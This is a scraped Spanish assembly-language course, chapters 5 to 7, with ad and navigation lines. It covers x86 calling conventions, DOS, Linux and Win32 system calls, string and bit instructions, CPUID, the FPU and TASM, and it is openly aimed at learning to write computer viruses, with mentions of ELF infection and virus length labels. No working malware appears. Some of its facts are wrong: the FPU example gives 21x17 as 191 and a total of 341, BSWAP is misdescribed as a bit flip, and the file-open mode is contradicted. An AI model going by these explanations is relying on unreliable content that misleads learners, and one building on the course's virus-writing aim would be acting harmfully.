Cul es el sentido de esto? Bien, una forma estndar de llamar a funciones consiste en lo siguiente: si tenemos que pasarle parmetros, lo que hacemos es empujarlos en la pila y despus llamar a la funcin. Leemos los valores de la pila dentro de la subrutina sin cambiar el puntero de pila, y cuando queramos regresar no slo queremos que el RET saque su direccin de retorno sino que adems la pila aumente lo suficiente como para que la pila vuelva a estar en su lugar, como si no hubiramos empujado los parmetros.
Es decir, pongamos que hacemos PUSH EAX y PUSH EBX y luego un CALL . En esta leemos directamente los valores empujados a la pila con un MOV ,[ESP+4] y MOV ,[ESP+8] (s, podemos leer as de la pila sin problemas y sin modificar ESP). Ahora, al volver queremos que la pila se quede como estaba antes de ejecutar el primer PUSH EAX. Pues bien, entonces lo que hacemos es escribir al final de la subrutina un RET 8, lo que equivale a los dos registros que habamos empujado como parmetros.
Como tampoco me voy a morir si lo hago, adaptar el cdigo anterior a esta forma de hacer las cosas (que personalmente no es que me guste mucho pero vamos, el caso es que se usa...)
> mov eax,<valor1> mov ebx,<valor2> push eax push ebx call Producto > [...] ; Suponemos que EAX contiene N, y EBX, contiene M. Producto: mov eax,dword ptr [ESP+8] mov ebx,dword ptr [ESP+4] xor edx,edx ; Aqu vamos a almacenar el resultado final. La operacin xor edx,edx hace EDX = 0. LoopSuma: ; Esto, es una etiqueta add edx,eax ; A EDX, que contendr el resultado final, le sumamos el primer multiplicando dec ebx jnz LoopSuma ; Si el resultado de decrementar el multiplicando EBX es cero, no sigue sumando el factor de EAX.
""
Curso gratis creado por Wintermute . 22 Febrero 2006 Excel Avanzado - Arequipa Domine y Aproveche el potencial de MS Excel 2010. Inicio: 20 Junio www.bsgrupo.com Anuncios Google
< anterior | 1 .. 7 8 9 10 11 .. 18 | siguiente >
En este captulo vamos a presentar algunos conceptos avanzados en la programacin en lenguaje ensamblador, como la relacin con la API. Tambin, listar toda una serie de instrucciones que me parecen importantes a la hora de programar, y que an no han sido mencionadas. Todo, ir acompaado de ejemplos de cdigo, que a estas alturas ya deberamos de saber manejar un poco. As como los apartados 5.1, 5.2 y 5.3 son bastante importantes, a quienes se vean abrumados por todo esto ya les digo que pueden saltarse tranquilamente el apartado 5.4 (dedicado al coprocesador) . Se van a perder poco si se los saltan en el sentido de que si les resulta ya agotador todo lo aprendido hasta el momento, esto puede que les despiste del verdadero objetivo en el sentido de que no es necesario entenderlo para escribir virus ni para aprender ensamblador; se trata de un poquito de "cultura general" sobre cmo funcionan las cosas internamente (en cualquier caso he intentado dar una visin poco profunda en ese apartado precisamente para no marear a nadie). Interrupciones y API Introduccin La API es, como decamos en el segundo captulo de este tutorial, la herramienta por la cual nos comunicamos con el sistema operativo y las funciones que este tiene para hacernos la vida ms fcil. Una operacin puede ser abrir un fichero, escribir sobre l, cambiar el directorio actual o escribir en la pantalla. Hay dos mtodos que vamos a ver en que se usa API del sistema operativo; por interrupciones pasando los parmetros en registros como hace Ms-Dos, por llamadas a subrutina como hace Win32, y un hbrido con llamadas a interrupcin y paso de parmetros en pila, el sistema operativo Linux. Interrupciones en Ms-Dos Vale, lo primero que hay que tener en la cabeza es que en Ms-Dos *todo* se hace a travs
de interrupciones; y que distintas interrupciones llaman a servicios orientados hacia algo distinto. Qu es una interrupcin software?. Se trata de un tipo muy especial de llamada a una funcin del sistema operativo (o de otros programas residentes, el sistema es bastante flexible). La instruccin para hacerlo es INT, y viene acompaada siempre de un nmero del 0 al 255 (decimal), es decir, del 00h al 0FFh en hexadecimal. Dnde se va la ejecucin cuando escribimos por ejemplo "INT 21h"? Bien, en Ms-Dos, en la posicin de memoria 0000:0000 (en Ms-Dos usamos un direccionamiento de 16 bits pero paso de explicarlo porque a estas alturas es un tanto ridculo jugar con el Ms-Dos) hay una "Tabla de Vectores de Interrupcin" o IVT. Esta IVT, contiene 256 valores que apuntan a distintas direcciones de memoria, a las que va a saltar la ejecucin cuando se haga una INT. Entonces, si escribimos algo como "INT 21h", lo que va a hacer es leer en la posicin de memoria 0000 + (21*4), el valor que hay, para luego pasar (como si fuera un CALL, empujando en la pila la direccin de retorno) a ejecutar en esa posicin de memoria. En realidad, la nica diferencia con un CALL es que no le indicamos la direccin a la que saltar (el procesador la lee de la tabla de interrupciones), y que adems de empujar el valor de la direccin de retorno, se empuja tambin el registro de FLAGS. Por ello, cuando se acaba de ejecutar el servicio solicitado de la interrupcin, esta rutina no acaba en un RET, sino en lo que antes habamos mencionado, en un IRET; la funcin de esta instruccin es sencilla: saca la direccin de retorno y los flags, en lugar de tan slo la direccin de retorno. Como ejemplo prctico, el tipo de funcin en Ms-Dos dentro de una interrupcin suele indicarse en EAX, y los parmetros en el resto de registros (EBX, ECX y EDX normalmente). Por ejemplo, cuando queramos abrir un fichero como slo lectura tenemos que hacer lo siguiente: mov ax, 3D02h ; el 3D indica "abrir fichero", y el 02h indica "en lectura y escritura" mov dx, offset Fichero ; Apuntamos al nombre del fichero int 21h ; Ahora, se abrir el fichero (paso de explicar todavia qu es un handler xD) Fichero: db 'fichero.txt',0 Bueno, nos hemos encontrado (qu remedio) una cosa nueva de la que no habamos hablado antes... esto de "db" significa "data byte", vamos, que estamos indicando datos "a pelo", en este caso el nombre de un fichero. Y s, hay una coma, indicando que despus de esos datos "a pelo" se ponga un byte con valor cero (para delimitar el fin del nombre del fichero). DX va a apuntar a ese nombre de fichero y AX indica la funcin... y voil, fichero abierto. Destacar otra cosa: existen dos instrucciones que sirven para activar o inhabilitar las interrupciones (ojo, que inhabilitar no las deshace por completo, pero s impide la mayor parte; es til por ejemplo al cambiar los valores de SS/SP para que no nos pete en la cara). CLI (CLear Interrupts) inhabilita las interrupciones, y STI (SeT Interrupts) las activa.
Otra cosa: se puede ver que no estoy usando registros extendidos, que uso AX y DX en vez de EAX y EDX... en fin, recordad hace cunto que existe el Ms-Dos y as respondis a la pregunta :-) Y en fin, que esto es el sistema de interrupciones en Ms-Dos, que me niego a volver a tocar porque es perder el tiempo: a quien le interese que escriba en un buscador algo as como "Ralf Brown Interrupt List", que es una lista salvaje que tiene todas las funciones habidas y por haber para interrupciones de Ms-Dos. Las ms importantes estn dentro de la INT 21h, que controla cosas como el acceso a ficheros (creacion, lectura/escritura, borrado...) y directorios. La Int80h y Linux En Linux pasa tres cuartas de lo mismo, pero todas las funciones del sistema estn reunidas bajo una sla interrupcin, la 80h. Vamos a tener 256 posibilidades, que se indican en AL (bueno, podemos hacer un //MOV EAX,// igualmente). Hay algunas diferencias bsicas con el sistema de Ms-Dos. La primera es ms "terica" y hace referencia a la seguridad. Cuando estamos ejecutando normalmente, el procesador tiene privilegio de "usuario". Cuando llamamos a la INT80h, pasamos a estado de supervisor y el control de todo lo toma el kernel. Al terminar de ejecutarse la interrupcin, el procesador vuelve a estar en sistema usuario (y por supuesto con nivel de usuario el proceso no puede tocar la tabla de interrupciones). Con Ms-Dos digamos que siempre estamos en supervisor, podemos cambiar los valores que nos salga de la tabla de interrupciones y hasta escribir sobre el kernel... pero vamos, lo importante, que con este sistema, en Linux est todo "cerrado", no hay fisuras (excepto posibles "bugs", que son corregidos, a diferencia de Windows). Respecto al paso de parmetros, se utilizan por rden EBX, ECX, etc (y si la funcin de interrupcin requiere muchos parmetros y no caben en los registros, lo que se hace es almacenar en EBX un puntero a los parmetros. mov eax, 05h ; Funcin OpenDir (para abrir un directorio para leer sus contenidos) lea ebx, [diractual] ; LEA funciona como un "MOV EBX, offset diractual"; es ms cmodo. xor ecx, ecx int 080h diractual: db '.',0 ; Queremos que habra el directorio actual, o sea, el '.' Para ms informacin, recomiendo echar un vistazo a www.linuxassembly.org, de donde tiene que colgar algn link hacia listas de funciones. Y tambin cuidado porque aunque en Linux parece que todo est documentado hay mucho que o no lo est o incluso est mal (si alguien se ha tenido que mirar la estructura DIRENT sabr de qu le hablo, es ms difcil hacer un FindFirst/FindNext en ASM en Linux que infectar un ELF xD) DLL's y llamadas en Windows Bajo Win32 (95/98/Me/NT/etc) no vamos a utilizar interrupciones por norma general. Resulta que la mayor parte de funciones del sistema estn en una sla librera, "KERNEL32.DLL", que suelen importar todos los programas.
DLL significa Librera Dinmica, y no solo tiene porque tener funciones "bsicas" (por ejemplo, en Wininet.DLL hay toda una serie de funciones de alto nivel como enviar/coger fichero por FTP). Lo que sucede es que cuando un programa quiere hacer algo as (pongamos estas funciones de FTP) tiene dos posibilidades: uno, las incorpora a su cdigo, y dos, las coge de una librera dinmica. Cul es la ventaja de esto? Bien, cuando usamos una librera dinmica no tenemos que tener diez copias de esa rutina en cada uno de los programas compilados; al estar en la DLL, el primer programa que la necesite la pide, la DLL se carga en memoria, y se usa una sla copia en memoria para todos los programas que pidan servicios de ella. En palabras sencillas; tenemos la funcin MessageBox, por ejemplo, que abre una ventana en pantalla mostrando un mensaje y con algn botn del tipo OK, Cancelar y tal. Qu es ms eficiente, tener una librera que sea consultada por cada programa, o tener una copia en cada uno?. Si cada programa ocupa 100Kb de media y la librera 10Kb, al arrancar 10 veces el programa si tuviramos el MessageBox en DLLs, el espacio en memoria sera de 1010Kb (y en disco, igual). En caso de que no usramos DLLs y la funcin MessageBox estuviera en cada programa, tendramos 1100Kb de memoria ocupada (y de disco). Por cierto, que el Linux tambin usa libreras dinmicas, slo que para programar en ASM sobre l normalmente nos va a sobrar con lo que tengamos en la Int80h. Volviendo al tema, la forma de llamar a una funcin de la API en Win32 es como lo que comentbamos de paso de parmetros al final del apartado dedicado a subrutinas. Todos los valores que han de pasrsele a la funcin se empujan a la pila, y luego se hace un CALL a la direccin de la rutina. El aspecto de una llamada a la API de Win32 (exctamente a MessageBox), es as: push MB_ICONEXCLAMATION ; El tipo de ventana a mostrar push offset Azathoth ; Esto, el ttulo de la ventana que va a aparecer. push offset WriteOurText ; Y esto el texto de dentro de la ventana. push NULL call MessageBoxA ; Llamamos tras empujar los parmetros, y luego seguimos ejecutando || WriteOurText: texto. || db || 'H0 H0 H0 NOW I HAVE A MACHINE GUN',0 || ; El 0 delimita el final del || || Azathoth: || || db || 'Hiz :P',0 || || || || || || || || La mayora de las funciones que se van a utilizar estn en KERNEL32.DLL. No obstantes hay otras, como USER.DLL, bastante importantes. Podemos ver si un ejecutable las importa si estn en su "tabla de importaciones" dentro del fichero (es decir, que est indicado que se usen funciones de ellas). Una de las cosas ms interesantes sobre este sistema, ser que podemos cargar DLLs (con la API LoadLibrary) an cuando ya se haya cargado el programa, y proveernos de servicios que nos interesen. Una lista bastante interesante de funciones de la API de Windows est en el tpico CD del //SDK// de Windows; puede encontrarse tambin por la Red, se llama win32.hlp y ocupa ms de 20Mb (descomprimido).
Representacin de datos, etiquetas y comentarios Buena parte de lo que voy a explicar ahora ha aparecido irremediablemente en ejemplos de cdigo anteriores; no obstante, creo que ya es hora de "formalizarlo" y detallarlo un poco. As pues, hablemos de estos formalismos utilizados en lenguaje ensamblador (tomar como base los del Tasm, algunos de los cuales lamentablemente no son aplicables al Nasm de Linux): Datos La forma ms bsica de representar datos "raw", o sea, "a pelo", es usar DB, DW o DD. Como se puede uno imaginar, B significa byte, W word y D Dword (es decir, 8, 16 y 32 bits). Cuando queramos usar una cadena de texto - que encerraremos entre comillas simples -, usaremos DB. As, son vlidas expresiones como las siguientes: db 00h, 7Fh, 0FFh, 0BAh dw 5151h dd 18E7A819h db 'Esto tambin es una cadena de datos' db 'Y as tambin',0 db ?,?,? ; as tambin... esto indica que son 3 bytes cuyo valor nos es indiferente. Hay una segunda forma de representar datos que se utiliza cuando necesitamos poner una cantidad grande de ellos sin describir cada uno. Por ejemplo, pongamos que necesito un espacio vaco de 200h bytes cuyo contenido quiero que sea "0". En lugar de escribirlos a pelo, hacemos algo como esto: db 200h dup (0h) Etiquetas Ya hemos visto el modo ms sencillo de poner una etiqueta; usar un nombre (ojo, que hay que estar pendiente con maysculas/minsculas porque para ensambladores como Tasm, "Datos" no es lo mismo que "dAtos" o que "datos"), seguido de un smbolo de ":". Cualquier referencia a esa etiqueta (como por ejemplo, MOV EAX,[Datos]), la utiliza para sealar el lugar donde ha de actuar. Pero hay ms formas de hacer referencias de este tipo; podemos marcar con etiqueta un byte escribiendo el nombre y a continuacin "label byte" (etiquetar byte). Un ejemplo (y de paso muestro algo ms sobre lo que se puede hacer) sera esto: virus_init label byte <cdigo> <cdigo> virus_end label byte virus_length equ virus_end virus_init Parece que siempre que meto un ejemplo saco algo nuevo de lo que antes no haba hablado... pero bueno, creo que se entiende; marcamos con label byte inicio y fin del virus, y hacemos que el valor virus_length equivalga gracias al uso de "equ", a la diferencia entre ambos (es decir, que si el cdigo encerrado entre ambas etiquetas ocupa 300 bytes, si hacemos un "MOV EAX, virus_length" en nuestro cdigo, EAX pasar a valer 300).
Comentarios Conocemos en este punto de sobra la forma standard de incluir comentarios al cdigo, esto es, utilizando el punto y coma. Todo lo que quede a la derecha del punto y coma ser ignorado por el programa ensamblador, con lo que lo utilizaremos como comentarios al cdigo. Hay otro mtodo interesante presente en el ensamblador Tasm, que seala el inicio de un comentario por la existencia de la cadena "Comment %". Todo lo que vaya despus de esto ser ignorado por el ensamblador hasta que encuentre otro "%", que marcar el final: Comment % Esto es un comentario para Tasm y puedes escribir lo que quieras entre los porcentajes. %
10 - Ensamblador VI
Curso gratis creado por Wintermute . 22 Febrero 2006 Software Contable en Per Listo para NIIF, Facil de Manejar, Integrado. Desde S/. 500 Vea Demo! www.worldoffice.com.pe Anuncios Google
< anterior | 1 .. 8 9 10 11 12 .. 18 | siguiente >
Otras instrucciones importantes En este apartado, veremos unas cuantas instrucciones que me ha faltado mencionar hasta ahora y que son muy tiles a la hora de programar en ensamblador. Para ver una lista completa recomiendo ir a www.intel.com y buscar su documentacin (se encuentra en formato PDF). En el siguiente apartado, el 5.4, menciono otras cuantas operaciones que pueden resultar tiles, aunque no sean tan necesarias como estas. CLC/STC Se trata de dos instrucciones que manejan directamente los valores del Carry Flag. CLC significa CLear Carry (lo pone a cero como es de suponer) y STC es SeT Carry (ponindolo a 1). Instrucciones de desplazamiento lateral Ya hemos visto como podemos operar con un registro o una posicin de memoria con operaciones aritmticas (ADD, SUB, etc) y lgicas (AND, OR, etc). Nos faltan pues las instrucciones de desplazamiento lateral, de las que hay de dos tipos: -Rotacin: Aqu tenemos ROL y ROR, que significa ROtate Left y ROtate Right. El modo de funcionamiento es sencillo; si ejecutamos un ROR EAX,1, todos los bits de EAX se movern un paso a la derecha; el primer bit pasar a ser el segundo, el segundo ser el tercero, etc. Qu pasa con el ltimo bit, en este caso el bit 32?. Bien, es sencillo, este bit pasar a ser ahora el primero. En el caso de ROL, la rotacin es a izquierdas; viendo un caso prctico, supongamos la instruccin ROL AL,2, donde AL valga 01100101. El resultado de esta operacin sera 10010101. Se puede comprobar que se han movido en dos posiciones los bits hacia la izquierda; y si alguno "se sale por la izquierda", entra por la derecha. -Desplazamiento aritmtico: Tenemos aqu a las instrucciones SHL y SHR, es decir, SHift
Left y SHift Right. La diferencia con ROL/ROR es sencilla, y consiste en que todo lo que sale por la izquierda o por la derecha se pierde en lugar de reincorporarse por el otro lado. Es decir, si hacemos un SHL AL,2 al AL aquel que decamos antes y que vala 01100101, el resultado ser en esta ocasin 10010100 (los dos ltimos espacios se rellenan con ceros). Es interesante notar que un SHL de una posicin es como multiplicar por dos la cifra, dos posiciones multiplicar por 4, tres por 8, etc. De cadena Existe toda una serie de instrucciones en el ensamblador 80x86 dedicadas a tratar cadenas largas de bytes; en estas instrucciones vamos a encontrar algunas como MOVSx, CMPSx, SCASx, LODSx y STOSx: -MOVSx: La x (y lo mismo sucede con el resto) ha de ser sustituda por una B, una W o una D; esto, indica el tamao de cada unidad con la que realizar una operacin (B es Byte, 8 bits, W es Word, 16 bits, y D es Dword, 32 bits). Cuando se ejecuta un MOVSx, se leen tantos bytes como indique el tamao de la "x" de la direccin DS:[ESI], y se copian en ES:[EDI]. Adems, los registros ESI y EDI se actualizan en consecuencia segn el "movimiento realizado". Es decir, que si tenemos en DS:[ESI] el valor "12345678h" y en ES:[EDI] el valor "87654321h", la instruccin MOVSD har que en ES:[EDI] el nuevo contenido sea ese "12345678h". -CMPSx: En esta instruccin de cadena, se comparar el contenido del byte/word/dword (dependiendo del valor de "x", segn sea B, W o D) presente en la direccin DS:[ESI] con el de la direccin ES:[EDI], actualizando los flags de acuerdo a esta comparacin (como si se tratara de cualquier otro tipo de comparacin). Como suceda antes, ESI y EDI se incrementan en la longitud de "x". -SCASx: Compara el byte, word o dword (segn el valor de "x") en ES:EDI con el valor de //AL, AX o EAX //segn la longitud que le indiquemos, actualizando el registro de flags en consecuencia. La utilidad de esta instruccin, reside en la bsqueda de un valor "escaneando" (de ah el nombre de la instruccin) a travs del contenido de ES:EDI (recordemos que, como en las anteriores, EDI se incrementa tras la instruccin en el valor indicado por la "x"). -LODSx: Carga en AL, AX o EAX el contenido de la direccin de memoria apuntada por DS:ESI, incrementando luego ESI segn el valor de la "x". Es decir, que si tenemos en DS:ESI los valores "12h, 1Fh, 6Ah, 3Fh", un LODSB pondra 12h en AL, LODSW hara AX como 1F12h, y LODSD dara a EAX el valor de 03F6A1F12h. -STOSx:La operacin contraria a LODSx, almacena AL, AX o EAX (segn lo que pongamos en la "x") en la direccin apuntada por ES:EDI, incrementando despus EDI segn el valor de la "x". Ejemplificando, si por ejemplo AX vale 01FF0h y ES:EDI es "12h, 1Fh, 6Ah, 3Fh", un STOSW har que en ES:EDI ahora tengamos "F0h, 1Fh, 6Ah, 3Fh".
//-REP:// La potencia de las anteriores operaciones se vera mermada si no contramos con una nueva instruccin, REP, que les confiere una potencia mucho mayor. Este REP es un prefijo que se antepone a la operacin (por ejemplo, REP MOVSB), y que lo que hace es repetir la instruccin tantas veces como indique el registro ECX (cada vez que lo repite, se incrementar ESI, EDI o los dos segn corresponda y se decrementar ECX hasta que llegue a cero, momento en que para). La utilidad es muy grande por ejemplo cuando queremos copiar una buena cantidad de datos de un lugar a otro de memoria. Supongamos que tenemos 200h datos a transferir en un lugar que hemos marcado con la etiqueta Datos1, y que queremos trasladarlos a una zona de memoria marcada por Datos2 como etiqueta: lea esi,Datos1 ; la utilidad de LEA est explicada ms adelante; carga en ESI la direccin de Datos1. lea edi,Datos2 ; lo mismo pero con EDI. mov ecx,200h ; Cantidad de datos a copiar rep movsb ; Y los copiamos... - STD/CLD: Aunque es de un uso escaso, hay un flag en el registro de EFLAGS que controla algo relacionado con todo esto de las instrucciones de cadena. Estamos hablando del "Direction Flag", que por defecto est desactivado; cuando as es y se lleva a cabo alguna (cualquiera) de las operaciones de cadena anteriormente especificadas, ESI y/o EDI se incrementan de la forma ya mencionada. Sin embargo, cuando este flag est a "1", activado, ESI y/o EDI en la operacin se decrementan en lugar de incrementarse. La funcin entonces de las dos instrucciones indicadas, STD y CLD, es la de tener un control directo sobre sta cuestin. La rden STD significa Set Direction Flag; pone a "1" este flag haciendo que al realizarse la operacin los punteros ESI y/o EDI se decremente(n). La rden -CLD significa Clear Direction Flag, y lo pone a "0" (su estado habitual), tornando en incremental la variacin del valor de los punteros al llevarse a cabo las operaciones de cadena. LEA El significado de LEA, es "Load Effective Adress"; calcula la direccin efectiva del operando fuente (tiene dos operandos) y la guarda en el primer operando. El operando fuente es una direccin de memoria (su offset es lo que se calcula), y el destino es un registro de propsito general. Por ejemplo: LEA EDX, [Etiqueta+EBP]: En EDX estar la direccin de memoria a la que equivale Etiqueta + EBP (ojo, la direccin, NO el contenido). LOOP La instruccin LOOP es un poco como la forma "oficial" de hacer bucles en ensamblador, y el porqu de que ECX sea considerado como "el contador". Este comando tiene un slo
parmetro, una posicin de memoria (que normalmente escribiremos como una etiqueta). Cuando se ejecuta comprueba el valor de ECX; si es cero no sucede nada, pero si es mayor que cero lo decrementar en 1 y saltar a la direccin apuntada por su operando. mov ecx, 10h ; Queremos que se repita 10h veces. Bucle: > > loop Bucle Como es lgico, el loop actuar ejecutando lo que hay entre "Bucle" y l 10h veces, cada vez que llegue al LOOP decrementando ECX en uno. XCHG La operacin XCHG, intercambia el contenido de dos registros, o de un contenido de un registro y la memoria. Son vlidos, pues: XCHG EAX,[EBX+12]: Intercambia el valor contenido en la posicin de memoria apuntada por [EBX+12], y el registro EAX. XCHG ECX, EDI Existe una variante, XADD, que lo que hace es intercambiarlos igual, pero al tiempo sumarlos y almacenar el resultado en el operando destino. Esto es: XADD EAX,EBX: Lo que har es que al final EBX valdr EAX, y EAX, la suma de ambos. Otras instrucciones interesantes Instrucciones a nivel de Bit A veces no queremos operar con bytes completos, sino quiz poner a 1 un slo bit, a 0, o comprobar en qu estado se encuentra. Bien que esto se puede hacer utilizando instrucciones como el AND (por ejemplo, si hacemos AND AX,1 y el primer bit de AX no est activado el flag de Zero se activar, y no as en otro caso), OR (los bits a 1 de la cifra con la que hagamos el OR activarn los correspondientes del origen y un 0 har que nada vare), y de nuevo AND para poner a cero (los bits del operando con el AND puestos a 1 no variarn, y los 0 se harn 0...). El caso, que tenemos instrucciones especficas para jugar con bits que nos pueden ser tiles segn en qu ocasiones (un ejemplo de utilizacin se puede ver en el cdigo de encriptacin de mi virus Unreal, presente en 29A#4). Estas son: -BTS: Bit Test and Set, el primer operando indica una direccin de memoria y el segundo un desplazamiento en bits respecto a esta. El bit que toque ser comprobado; si es un 1, se activa el carry flag (comprobable con JC, ya se sabe) y si es 0, pues no. Adems, cambia el bit, fuera cual fuese en principio, a un 1 en la localizacin de memoria indicada. Por ejemplo, un "BTS [eax+21],16h" contara 16h bits desde la direccin //"eax+21"//, comprobara el bit y lo cambiara por un 1.
- BTR: Bit Test and Reset, como antes el primer operando se refiere a una direccin y el segundo a un desplazamiento. Hace lo mismo que el BTS, excepto que cambia el bit indicado, sea cual sea, por un 0. -BT: Bit Test, hace lo mismo que las dos anteriores pero sin cambiar nada, slo se dedica a comprobar y cambiar el Carry Flag. -BSWAP: Pues eso, Bit Swap... lo que hace es ver el desplazamiento con el segundo operando (el formato, como en las anteriores), y cambiar el bit; si era un 1 ahora ser un 0 y viceversa. -BSF: Bit Scan Forward, aqu vara un poco el tema; se busca a partir de la direccin indicada por el segundo operando para ver cul es el bit menos significativo que est a 1. Si al menos se encuentra uno, su desplazamiento se almacenar en el primer operando. Es decir, si hacemos BSF EAX,[EBX] y en EBX tenemos la cadena 000001xxx, EAX valdr 5 tras ejecutar esta instruccin. Tenemos tambin una instruccin, BSR, que hace lo mismo pero buscando hacia atrs (Bit Scan Reverse). CPUID Se trata de una instruccin que devuelve el tipo de procesador para el procesador que ejecuta la instruccin. Tambin indica las caractersticas presentes en el procesador, como si tiene coprocesador (FPU o Floating Point Unit). Funciona en todo procesador a partir de 80486. Dependiendo del valor de EAX devuelve cosas distintas: -Si EAX = 0: Aqu lo que estamos haciendo es comprobar la marca. Por ejemplo, con un Intel, tendramos EBX = "Genu", ECX = "ineI' y EDX = "ntel". En el caso de AMD, tendremos EBX = "Auth", ECX = "enti" y EDX = "cAMD". -Si EAX = 1: En este caso, se intenta averiguar caractersticas de la familia del procesador. En EAX, se devuelve la informacin de esta, as: //31-14: Sin usar 13-12: Tipo de Procesador 11-8: Familia del Procesador 7-4: Modelo de Procesador 3-0: Stepping ID // Tambin en la web de Intel se puede encontrar informacin ms detallada a este respecto. Reproduzco de todas formas, una tabla con los valores de diferentes procesadores que saqu hace tiempo (es escasa y no tiene en cuenta K6-3, K7 y Pentium III, pero sirve como muestra): || //Familia // || //Procesador // || //Modelo // || || 0100 || 1000 || Intel DX4 || || 0101 || 0001 || Pentium (60-66 Mhz) || || 0101 || 0010 || Pentium (75-200 Mhz) ||
|| 0101 || 0100 || Pentium MMX (166-200 Mhz) || || 0110 || 0001 || Pentium II || || 0110 || 0011 || Pentium II, model 3 || || 0110 || 0101 || Pentium II model 5 y Celeron || || 0101 || 0110 || K6 || || 0101 || 1000 || K6-2 || RDTSC Esta instruccin, significa "ReaD TimeStamp Counter". Su funcin, es la de devolvernos en el par EDX:EAX el "Timestamp" almacenado por el procesador. Este contador es almacenado por el procesador y se resetea cada vez que lo hace el procesador, incrementndose en una unidad cada vez que sucede un ciclo de reloj. Por lo tanto, es obvia su utilidad como generador de nmeros aleatorios, aunque por algn motivo que no alcanzo a comprender, dependiendo de un flag en el registro interno CR4 (el flag TSD, Time Stamp Disable) esta instruccin puede ser restringida para ser ejecutada en el modo User del procesador (en la prctica, por ejemplo bajo Windows 98 la instruccin no devuelve nada pues est deshabilitada en este flag, sin embargo en Linux s lo da...).
11 - Ensamblador VII
Curso gratis creado por Wintermute . 22 Febrero 2006 Excel avanzado - Arequipa Convirtete en un Experto en MS Excel. Inicio 20 de Junio www.bsgrupo.com Anuncios Google
< anterior | 1 .. 9 10 11 12 13 .. 18 | siguiente >
Introduccin al coprocesador matemtico Conceptos bsicos El coprocesador matemtico o FPU (Floating-Point Unit) utiliza nmeros tanto reales como enteros, y se maneja mediante instrucciones integradas en el grupo comn que utilizamos; es decir, que simplemente tiene sus instrucciones especficas que l va a utilizar. Los nmeros se representan normalizados, con 1 bit de signo, exponente y mantisa. Me gustara poder explicar esto al detalle pero necesitara demasiado espacio y no creo que resulte tan til... tan slo destacar que este es el tipo de formato que se usa para representar nmeros reales, y se basa en que el primer bit del registro indica el signo (0 es positivo, 1 negativo), otros cuantos bits (en este caso 13) representan un exponente, y otros cuantos (64 esta vez) una mantisa. Es decir, que por decirlo de una forma algo burda, para obtener el nmero real deberamos coger la mantisa y elevarla a este exponente. As, podemos ver que son 80 los bits que tiene cada registro de la FPU. Estos registros son ocho en total, y sus nombres consisten en una R seguida de un nmero, yendo desde R0 a R7. La pila del coprocesador La forma de acceder a los registros no es como en la CPU. Por decirlo de alguna manera, se forma una pila de registros con estos ocho registros de datos, operndose con el primero en esta pila (que llamamos ST(0)) y con varias instrucciones para mover los propios registros del copro con este objetivo. Para referenciar en ensamblador a estos registros se har a traves de la mencionada pila. Lo ms alto de la pila ser ese ST(0) - o simplemente, ST - , y podemos hacer operaciones como la siguiente: FADD ST, ST(2)
Por supuesto, el resultado de esta suma entre el primer y tercer valor de la pila del coprocesador, almacenar el resultado en esta parte superior de la pila (ST), desplazando al resto en una posicin hacia abajo (el anterior ST ser ahora ST(1), y el ST(2) ser ahora ST(3)). El sistema puede resultar - y de hecho es - algo lioso, pero todo se aclara si se utiliza un buen debugger y se comprueba a mano lo que estoy diciendo, y cmo la FPU administra sus registros. Ejemplo de una multiplicacin con la FPU Como no me quiero entretener mucho con esto - que probablemente nadie vaya a usar -, pasar directamente a utilizar un ejemplo bastante ilustrativo de lo que sucede cuando estamos utilizando la FPU. Pretendemos, en el ejemplo siguiente, llevar a cabo la operacin (10 x 15) + (17 x 21): fld 10 ; Cargamos en ST(0) el valor 10 fmul 15 ; Ahora 10 x 15 se almacena en ST(0) fld 17 ; ST(0) vale 17, y OJO, el resultado de 10x15 (150) estar en ST(1) fmul 21 ; ST(0) pasa a valer 21 x 17, es decir, 191. Tenemos pues que ;ST(0)=21x17=191 y ST(1)=10x15=150 fadd ST(1) ; Con esta instruccin aadimos a ST(0)(operando por defecto) ST(1), luego ;acabamos teniendo ST(0) = (21x17)+(10x15) = 341, resultado final. Una referencia completa de las instrucciones utilizadas por la FPU (que son muchas y permiten coger o guardar en memoria, transferir a un formato que entiendan los registros del procesador y viceversa y unas cuantas operaciones como incluso senos y cosenos), recomiendo echarle un vistazo a los manuales de Intel - aunque son medianamente oscuros con el tema.
Utilidades para la Programacin En este captulo tomaremos un punto de vista eminentemente prctico de cara a la programacin de virus; se trata, de una introduccin a ciertas utilidades que vamos a necesitar de cara a programar virus, y que hay que saber manejar al menos un mnimo. S que las utilidades que he escogido no sern del gusto de todos por diversos motivos; los dos compiladores de los que hablo (TASM y NASM, para Windows y Linux) creo que son de lo mejorcito que se puede encontrar -bien, podra haber hablado del GAS, GNU Assembler, en Linux, pero sinceramente odio el formato At&t de ensamblador, y lo interesante es que de programar en el formato que acepta TASM a hacerlo en el que acepta NASM hay muy pocas diferencias, con lo que lo que se aprende para uno puede servir bastante para el otro. El NASM sin embargo tiene algn problema incomprensible (por ejemplo, no compila la instruccin RDTSC pero tampoco indica que hayan errores).
El mismo motivo ha hecho que de cara a debuggers, detalle para Linux el ALD en lugar del GDB; bien que GDB es un debugger mucho ms potente, pero ALD es mucho ms sencillo de utilizar (entre otras cosas porque es parecido al Debug del Dos, y porque no usa el formato At&t). Esta razn de sencillez de uso es la que tambin hace que hable del Turbo Debugger 32 en Windows y no del Softice. Aunque Softice es la verdadera herramienta para trabajar en Windows, Turbo Debugger es mucho ms sencillo y se puede aprender en diez minutos (para el Softice habra que dedicar un captulo entero, aunque es cierto que merecera la pena). TASM (Windows/Ms-Dos) Introduccin La utilidad TASM es el clsico de los compiladores de ensamblador para Ms-Dos y Windows. Lo que hace es sencillamente convertir el texto que nosotros hemos escrito en un fichero de texto con las instrucciones en ensamblador de nuestro programa, en un ejecutable que podemos utilizar. Aqu quien no haya visto an la potencia del lenguaje ASM se dar cuenta; lo que escribimos no se modifica, es decir, si tenemos una rden "ADD EAX,EBX", en el programa compilado se va a codificar as y de ninguna otra manera. Que por qu digo esto? Pues en comparacin con lenguajes de alto nivel; por ejemplo si escribimos un Print ("Hola"); el compilador va a traducirlo a lenguaje ensamblador primero, llamando a funciones del sistema operativo para imprimir por pantalla. En los lenguajes de alto nivel no tenemos control sobre las instrucciones en ensamblador que se estn generando, pero en ASM dado que estamos escribiendo en el lenguaje de la propia mquina, tenemos el dominio total sobre la situacin. Aunque el paquete con el que viene TASM ocupe comprimido el equivalente a 5 diskettes y tenga unas cuantas cosas, hay dos ficheros en particular que son los que vamos a utilizar con mayor frecuencia. TASM viene con unas cuantas utilidades incorporadas, como el propio Turbo Debugger, un extractor de listados de APIs para utilizar en nuestros programas y alguna cosilla ms, pero en principio nos vamos a reducir a dos, 